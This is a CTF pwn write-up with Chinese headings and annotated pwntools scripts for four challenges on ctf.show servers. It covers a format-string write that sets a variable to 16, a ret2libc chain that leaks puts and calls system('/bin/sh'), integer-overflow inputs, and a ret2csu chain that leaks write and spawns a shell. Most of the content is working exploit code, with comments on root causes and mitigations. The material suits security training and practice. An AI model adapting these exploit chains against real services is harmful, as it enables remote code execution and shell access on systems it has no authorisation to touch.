格式化字符串漏洞,覆写num为16即可打印出flag
# -*- coding:utf-8 -*-
# Format-string challenge (pwn1): per the writeup title, user input reaches a
# printf-style format, and overwriting the global `num` with 16 prints the flag.
# Written for Python 2: str and bytes are one type, so p32(...) + "8"*12 works.
# Root cause on the program side is a user-controlled format string; the
# mitigation is a constant format ("%s", buf) plus -Wformat-security so the
# pattern is rejected at build time.
from pwn import *
context.log_level="debug"   # pwntools logs every byte sent and received
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28045)
elf=ELF("./pwn1")           # loaded but not referenced below
#gdb.attach(io,"b * 0x080485D0")
#pause()
num_addr=0x0804A030         # address of `num`; a fixed address, so presumably a non-PIE binary
io.recvuntil("try pwn me?")
# 4-byte address + 12 filler bytes = 16 bytes printed before the conversion;
# "%7$hhn" stores that running count as a single byte through the 7th
# positional argument, which presumably is where the leading p32(num_addr)
# sits on the stack — hence num becomes 16.
payload=p32(num_addr)+"8"*12+"%7$hhn"
io.sendline(payload)
#pause()
io.interactive()
栈溢出,ret2libc
# -*- coding:utf-8 -*-
# Stack-overflow challenge, ret2libc: leak puts@libc via its GOT entry, derive
# the libc base from a hard-coded offset, then return into system("/bin/sh").
# Written for Python 2 (str and bytes are interchangeable in the payloads).
# Root cause is an unbounded write past a 0x70-byte stack buffer; a length
# check on the read removes the bug, and a stack canary or PIE would each
# force an additional leak before this chain could run.
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28018)
elf=ELF("./pwn1")
puts_got=elf.got["puts"]    # GOT slot whose contents (puts@libc) are leaked
puts_plt=elf.plt["puts"]    # PLT stub used to print that slot
main_addr=0x400687          # return here after the leak so a second payload can be sent
pop_rdi=0x400793            # "pop rdi; ret" gadget (fixed address: non-PIE, presumably)
ret=0x40053e                # lone "ret" gadget
io.recvuntil("successful!\n")
# 0x70 bytes of filler, 8 more presumably covering the saved rbp, then the
# chain puts(puts_got) followed by a return to main.
payload="a"*0x70+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendline(payload)
# The leaked pointer is read up to its 0x7f high byte; keep the last 6 bytes
# and zero-pad to 8 so u64 can decode it.
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
# These offsets belong to one specific libc build (the challenge's); the
# source of the numbers is not shown on this page.
libc_base=puts_addr-0x0809c0
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9a
io.recvuntil("successful!\n")
# Second chain: system(binsh); the extra "ret" before system is presumably
# there to keep the stack 16-byte aligned at the call.
payload="a"*0x70+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(main_addr)
io.sendline(payload)
io.interactive()
整型溢出
# -*- coding:utf-8 -*-
# Integer-overflow challenge: three (a, b) pairs whose arithmetic wraps when
# the program stores them in 32-bit ints. The binary is not shown here, so
# which check each pair defeats is inferred from the values alone.
# Mitigation on the program side: range-check the parsed inputs before the
# arithmetic, use a wider type, or use overflow-checked arithmetic.
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28171)
elf=ELF("./pwn1")           # loaded but not referenced below
# 2147483658 + 2147483649 = 2^32 + 11, i.e. 11 after 32-bit wraparound
io.sendlineafter("a:",str(2147483658))
io.sendlineafter("b:",str(2147483649))
# 9629 * 446045 = 2^32 + 9, i.e. 9 after 32-bit wraparound
io.sendlineafter("a:",str(9629))
io.sendlineafter("b:",str(446045))
# 2147483648 is INT_MIN once truncated to a signed 32-bit int; paired with -1
# this looks like the INT_MIN / -1 (or INT_MIN - (-1)) corner case — the
# actual operation is not visible from this script.
io.sendlineafter("a:",str(2147483648))
io.sendlineafter("b:",str(-1))
io.interactive()
栈溢出,ret2csu
# -*- coding:utf-8 -*-
# Stack-overflow challenge, ret2csu: the two halves of a __libc_csu_init-style
# epilogue (gadget_1 pops rbx, rbp, r12..r15; gadget_2 moves them into argument
# registers and calls [r12+rbx*8]) are chained to call write() and leak a libc
# address, after which a plain pop-rdi chain calls system.
# Written for Python 2 (str and bytes are interchangeable in the payloads).
# Root cause is an unbounded write past a 160-byte stack buffer (inferred from
# the padding used below); a length check on the read removes the bug.
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28116)
elf=ELF("./pwn1")
write_got=elf.got["write"]  # GOT slot of write: both the leaked value and the csu call target
write_plt=elf.plt["write"]  # assigned but never used below
main_addr=0x4005FD          # return here after the leak so a second payload can be sent
# Gadget roles below are presumed from the ret2csu pattern — confirm against the binary.
gadget_2=0x00000000004006A0 # presumably "mov rdx,r13; mov rsi,r14; mov edi,r15d; call [r12+rbx*8]"
gadget_1=0x00000000004006BA # presumably "pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret"
def com_gadget(rbx,rbp,r12,r13,r14,r15,main_addr):
    """Build the ret2csu payload: filler, gadget_1, six register values, gadget_2.

    gadget_1 pops the six values into rbx, rbp, r12..r15 and gadget_2 then
    calls [r12+rbx*8] with them (module-level constants, not parameters).
    After that call 56 filler bytes are skipped — presumably the add rsp,8 and
    six pops that follow the call in gadget_2 — and execution returns to
    main_addr.  Note that the parameter main_addr shadows the module-level
    main_addr; the only call site passes the same value.

    Returns the payload as a Python 2 str (bytes).
    """
    payload="a"*(160+8)        # 160-byte buffer plus 8 bytes, presumably the saved rbp
    payload+=p64(gadget_1)
    payload+=p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
    payload+=p64(gadget_2)
    payload+="a"*56            # 7 qwords consumed by gadget_2 after the call (see docstring)
    payload+=p64(main_addr)
    return payload
io.recvuntil("Try Pwn Me?\n")
# First stage: rbx=0, rbp=1 (the cmp rbx,rbp after the call is presumably
# satisfied once rbx is incremented), r12=write_got as the call target,
# r13=8, r14=write_got, r15=1.  Under the usual csu mapping
# (rdx=r13, rsi=r14, edi=r15d) that is write(1, &write@got, 8): it prints
# the libc address of write and then returns to main.
payload=com_gadget(0,1,write_got,8,write_got,1,main_addr)
io.sendline(payload)
# Read up to the 0x7f high byte of the leaked pointer, keep 6 bytes, zero-pad for u64.
write_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("write_addr=="+hex(write_addr))
# Offsets for the challenge's libc build; their source is not shown on this page.
libc_base=write_addr-0x110140
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9a
pop_rdi=0x4006c3            # "pop rdi; ret" for the second stage
ret=0x4004a9                # lone "ret", presumably for 16-byte stack alignment before system
io.recvuntil("Try Pwn Me?\n")
# Second stage: same 168-byte filler as com_gadget, then system(binsh).
payload="a"*(160+8)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
io.sendline(payload)
io.interactive()